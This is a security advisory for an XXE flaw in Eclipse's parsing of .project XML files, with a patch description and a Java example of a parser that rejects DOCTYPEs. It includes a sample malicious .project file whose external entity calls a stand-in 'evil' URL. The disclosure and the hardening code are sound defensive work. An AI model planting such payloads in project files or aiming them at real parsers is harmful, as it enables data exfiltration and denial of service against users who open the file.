GHSA-j24h-xcpc-9jw8
Impact
XML files such as ".project" are parsed in a way that is vulnerable to all sorts of XXE attacks. The user only needs to open any malicious project, or update an open project with a malicious file (for example, to review a foreign repository or patch).
The vulnerability was found by static code analysis (SonarLint).
Example .project file:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE price [
<!ENTITY xxe SYSTEM "http://127.0.0.1:49416/evil">]>
<projectDescription>
<name>p</name>
<comment>&xxe;</comment>
</projectDescription>
Patches
Similar patches, including a JUnit test that demonstrates the vulnerability, have already been applied to PDE (see https://github.com/eclipse-pde/eclipse.pde/pull/667). The solution for Platform should be the same: reject parsing any XML that contains a DOCTYPE.
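As an added illustration (not code from this advisory or from the Eclipse patch), the following Java snippet shows how a .project reader can apply the fix described above: the parser factory is configured so that any DOCTYPE is rejected before an entity can be resolved, and the advisory's sample file is then refused while a clean file still parses. The class and method names (ProjectFileParser, readProjectName) are assumed.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class ProjectFileParser {

    // Hardened factory: a DOCTYPE (and therefore any entity declaration) is rejected
    // up front, so neither an external entity fetch nor an entity-expansion bomb can run.
    static DocumentBuilder newSafeBuilder() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a non-Xerces parser ignores the feature above.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    // Returns the <name> of the project, or null if the file was rejected by the parser.
    static String readProjectName(String xml) throws Exception {
        try {
            Document doc = newSafeBuilder().parse(
                    new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return doc.getElementsByTagName("name").item(0).getTextContent();
        } catch (SAXParseException e) {
            // Reached for the DOCTYPE case: the entity reference is never resolved.
            System.err.println("rejected .project file: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed inputs: the advisory's sample payload and a clean .project file.
        String malicious = "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
                + "<!DOCTYPE price [<!ENTITY xxe SYSTEM \"http://127.0.0.1:49416/evil\">]>"
                + "<projectDescription><name>p</name><comment>&xxe;</comment></projectDescription>";
        String clean = "<?xml version=\"1.0\" encoding=\"utf-8\"?>"
                + "<projectDescription><name>p</name><comment/></projectDescription>";
        System.out.println("malicious -> " + readProjectName(malicious));
        System.out.println("clean     -> " + readProjectName(clean));
    }
}
```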
Workarounds
No known workaround. Users can only avoid obtaining or opening foreign files with Eclipse. Firewall rules can protect against data exfiltration (but not against an XML bomb).
References
https://cwe.mitre.org/data/definitions/611.html
https://rules.sonarsource.com/java/RSPEC-2755
https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)